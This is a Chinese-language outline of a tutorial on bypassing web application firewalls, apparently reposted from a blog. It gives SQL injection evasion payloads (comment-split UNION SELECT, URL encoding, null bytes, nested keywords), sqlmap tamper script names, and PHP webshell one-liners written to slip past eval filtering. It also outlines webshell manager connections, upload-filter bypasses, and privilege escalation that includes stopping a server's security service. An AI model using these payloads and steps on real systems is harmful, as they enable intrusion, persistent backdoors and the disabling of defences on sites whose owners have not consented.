大綱:
WAF防護原理講解
目錄掃描繞過WAF
手工注入繞過WAF
sqlmap繞過WAF
撰寫salmap繞過WAF
過WAF一句話撰寫講解
菜刀連接繞過WAF
webshell上傳繞過WAF
提權繞過WAF
WAF繞過原理詳解
知己知彼百戰百勝
了解WAF防護原理
查看WAF防護位置
熟悉防護規則
了解防護機制
查看攔截時間閥值
目錄掃描繞過WAF
兩種方式:
1、修改客戶端IP
2、減慢掃描速度
3、通過代理欺騙WAF
手工注入繞過WAF
搭建測驗環境
了解繞過原理
熟悉常見繞過構造陳述句
構造繞過測驗環境
搭建環境
利用mysql客戶端
配置注入原始碼
注入繞過方法
1、大小寫變種
2、SQL注釋
3、URL編碼
4、空位元組
5、嵌套、剝離
6、非標準入口點
7、避開自定義過濾器
使用注釋
union select 1,2,3 from admin
注釋完
/**/union/**/select/**/1,2,3 from admin
/**/un/**/io/**/n/**/sel/**/ec/**/t/**/ 1,2,3 from admin
第二種注釋
/*!and*/ 1=2
URL編碼
正常編碼
‘為%27
1=52f *=%2a %=%25
/**/=%25 2f%25 2a*1
空位元組
一些過濾器處理輸入時,碰到拿到空位元組就會停止處理,
如:
id=1%00and1=2
嵌套剝離
一些過濾器將用戶的輸入進行剝離敏感函式
應對方法:
seleselectect
剝離后
select
總結撰寫繞過陳述句
利用注釋
/*^abc^*/
包含關鍵字
/*!/*!/*!union*/
變換提交方式
get->post方式或cookie
sqlmap tamper利用
symboliclogical.py
space2mssqlhash.py
appendnullbyte.py
利用修改tamper繞過waf
嘗試撰寫過waf一句話
思路:
利用可變變數
$a=b $b=c $$a=c
利用函式
利用判斷陳述句
利用編碼
<?php
@eval($_POST[x]);
?>
會攔截eval函式
<?php
@$_GET[a]($_post[x]);
?>
a:動態的傳參,傳eval函式或assert等函式
突破waf攔截連接菜刀
用最新版的菜刀
中國蟻劍
過狗菜刀+中轉腳本
上傳過waf
上傳突破禁止上傳PHP腳本
1、檔案包含
2、雙檔案上傳突破限制
3、修改上傳引數
提權過waf
通程序式讀密碼
利用waf繞過神器
利用exp讀hash
將用戶添加到遠程桌面組,并給目錄降權
用第三方軟體提權
system把安全狗服務停止,重啟服務器
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/57059.html
標籤:其他
上一篇:Nginx練習練習玩玩